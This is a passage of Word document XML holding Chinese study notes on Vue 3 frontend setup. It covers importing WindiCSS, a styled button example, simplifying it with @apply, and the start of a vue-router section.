        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665AF4E7" w14:textId="77777777" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CD91B3" w14:textId="4A723B60" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41759404" w14:textId="20811D39" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FCFC7D6" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6823ABD5" w14:textId="674FD849" w:rsidR="00C67EAA" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后一步，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t>.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中引入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52913392" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30B4560F" w14:textId="4FBB200E" w:rsidR="00C67EAA" w:rsidRPr="008A310C" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A310C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import 'virtual:windi.css'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D49580" w14:textId="77777777" w:rsidR="008A310C" w:rsidRDefault="008A310C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384B6476" w14:textId="2A31D567" w:rsidR="00C67EAA" w:rsidRDefault="008A310C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放在这部分即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718E60FA" w14:textId="77777777" w:rsidR="008A310C" w:rsidRDefault="008A310C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A71DC7B" w14:textId="77777777" w:rsidR="008A310C" w:rsidRDefault="008A310C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>app.use(ElementPlus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D243679" w14:textId="77777777" w:rsidR="008A310C" w:rsidRDefault="008A310C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="414A86FD" w14:textId="77777777" w:rsidR="008A310C" w:rsidRDefault="008A310C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008A310C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import 'virtual:windi.css'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6329793D" w14:textId="77777777" w:rsidR="008A310C" w:rsidRDefault="008A310C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C87722A" w14:textId="491D177D" w:rsidR="00C67EAA" w:rsidRDefault="008A310C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>app.mount('#app')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C560021" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37EE54D7" w14:textId="46023E5D" w:rsidR="00C67EAA" w:rsidRDefault="008A310C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="684" w:name="_Toc159780114"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>indicss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小案例和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r>
        <w:t>apply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简化代码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="684"/>
    </w:p>
    <w:p w14:paraId="36A1866C" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17AC70A5" w14:textId="09638ED6" w:rsidR="007818A4" w:rsidRPr="007818A4" w:rsidRDefault="007818A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>技巧：</w:t>
      </w:r>
      <w:r w:rsidRPr="007818A4">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>有时候触发vscode的windicss的自动补全功能，得手动敲个空格！windicss的样式显示更换，</w:t>
      </w:r>
      <w:r w:rsidR="00985B7F">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>有时候</w:t>
      </w:r>
      <w:r w:rsidRPr="007818A4">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>得重启npm的run</w:t>
      </w:r>
      <w:r w:rsidRPr="007818A4">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007818A4">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F66D075" w14:textId="77777777" w:rsidR="007818A4" w:rsidRDefault="007818A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A2C26C9" w14:textId="77777777" w:rsidR="007818A4" w:rsidRDefault="007818A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C892136" w14:textId="1936AF63" w:rsidR="008A310C" w:rsidRDefault="008A310C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以去</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windicss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看样式、颜色</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602B62AC" w14:textId="377E86F8" w:rsidR="00C67EAA" w:rsidRDefault="008A310C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008A310C">
        <w:t>https://cn.windicss.org/utilities/general/colors.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C370938" w14:textId="2A66603C" w:rsidR="00C67EAA" w:rsidRDefault="008A310C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如要把按钮的背景色改为紫色</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF808A2" w14:textId="77777777" w:rsidR="008A310C" w:rsidRDefault="008A310C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23A372AC" w14:textId="70047AE6" w:rsidR="008A310C" w:rsidRDefault="008A310C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008A310C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vscode</w:t>
      </w:r>
      <w:r w:rsidRPr="008A310C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>安装插件</w:t>
      </w:r>
      <w:r w:rsidRPr="008A310C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> windicss</w:t>
      </w:r>
      <w:r w:rsidRPr="008A310C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A310C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>inte</w:t>
      </w:r>
      <w:r w:rsidR="00E027F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>lliSense</w:t>
      </w:r>
      <w:r w:rsidRPr="008A310C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A310C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的这个插件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E2E7D9" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2712F6E9" w14:textId="3D8275D9" w:rsidR="00C67EAA" w:rsidRDefault="00E027F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E027F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E027F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;button class="bg-purple-500 text-light-700 px-4 py-2 rounded-full transition-all duration-500 hover:( bg-pink-900) focus:( ring-8 ring-purple-900)"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E027F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>按钮是吧</w:t>
      </w:r>
      <w:r w:rsidRPr="00E027F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0423E332" w14:textId="77777777" w:rsidR="001E4BDC" w:rsidRDefault="001E4BDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F3051F9" w14:textId="77777777" w:rsidR="00175D1E" w:rsidRDefault="001E4BDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是背景色，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是字体颜色</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F68886" w14:textId="77777777" w:rsidR="00175D1E" w:rsidRDefault="001E4BDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>px</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是横间距</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是纵向间距</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C35C40" w14:textId="77777777" w:rsidR="00175D1E" w:rsidRDefault="001E4BDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>round</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是圆角边框</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5539031D" w14:textId="5AE044FC" w:rsidR="00175D1E" w:rsidRDefault="00175D1E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00175D1E">
        <w:t>transition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是过度动作，可以配合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>duration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定过度动作的时间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680484C0" w14:textId="77777777" w:rsidR="00175D1E" w:rsidRDefault="00175D1E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是鼠标挪上去有啥动作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB8FF6A" w14:textId="07DA1386" w:rsidR="001E4BDC" w:rsidRDefault="00175D1E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>focus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鼠标点击时啥动作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48359630" w14:textId="31F16A3F" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2752D45F" w14:textId="77777777" w:rsidR="00985B7F" w:rsidRDefault="00985B7F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27D0CDC3" w14:textId="0A4AFD2C" w:rsidR="00985B7F" w:rsidRDefault="00C829CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后，可以简化代码，把一堆属性放在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> btn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>样式，设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>btn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BE3B1A" w14:textId="77777777" w:rsidR="00C829CF" w:rsidRDefault="00C829CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04D3201F" w14:textId="77777777" w:rsidR="00C829CF" w:rsidRDefault="00C829CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3283F3A5" w14:textId="77777777" w:rsidR="00C829CF" w:rsidRDefault="00C829CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075F67E0" w14:textId="77777777" w:rsidR="00C829CF" w:rsidRDefault="00C829CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C829CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;button class="btn"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C829CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>按钮是吧</w:t>
      </w:r>
      <w:r w:rsidRPr="00C829CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7220BFBC" w14:textId="77777777" w:rsidR="00C829CF" w:rsidRDefault="00C829CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D687473" w14:textId="77777777" w:rsidR="00C829CF" w:rsidRDefault="00C829CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B484202" w14:textId="77777777" w:rsidR="00C829CF" w:rsidRDefault="00C829CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1925A8" w14:textId="77777777" w:rsidR="00C829CF" w:rsidRPr="00C829CF" w:rsidRDefault="00C829CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829CF">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.btn{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C6A38E" w14:textId="77777777" w:rsidR="00C829CF" w:rsidRPr="00C829CF" w:rsidRDefault="00C829CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829CF">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  @apply</w:t>
      </w:r>
      <w:r w:rsidRPr="00C829CF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> bg-purple-500 text-light-700 px-4 py-2 rounded-full transition-all duration-500 hover:( bg-pink-900) focus:( ring-8 ring-purple-900)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C829CF">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507D4C70" w14:textId="77777777" w:rsidR="00C829CF" w:rsidRDefault="00C829CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C829CF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1131344F" w14:textId="71EA33F5" w:rsidR="00C67EAA" w:rsidRDefault="00C829CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3646089B" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BD3466D" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5433C689" w14:textId="23D4E058" w:rsidR="00C67EAA" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="685" w:name="_Toc159780115"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vue</w:t>
      </w:r>
      <w:r>
        <w:t>-router</w:t>
      </w:r>
      <w:bookmarkEnd w:id="685"/>
    </w:p>
    <w:p w14:paraId="169035EB" w14:textId="249FAB1D" w:rsidR="007F2C96" w:rsidRDefault="0066510F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官网：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35713524" w14:textId="4DF4A11F" w:rsidR="007F2C96" w:rsidRDefault="0066510F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId183" w:history="1">
        <w:r w:rsidRPr="00E86BDB">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://router.vuejs.org/zh/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30A026B2" w14:textId="7CC18C42" w:rsidR="00003060" w:rsidRDefault="00003060" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>教程：</w:t>
      </w:r>
      <w:r w:rsidRPr="00003060">
        <w:t>https://router.vuejs.org/zh/introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7683B01A" w14:textId="0D160B29" w:rsidR="0066510F" w:rsidRPr="0066510F" w:rsidRDefault="0066510F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为我们使用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的版本，所以如果要用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> router</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53106577" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
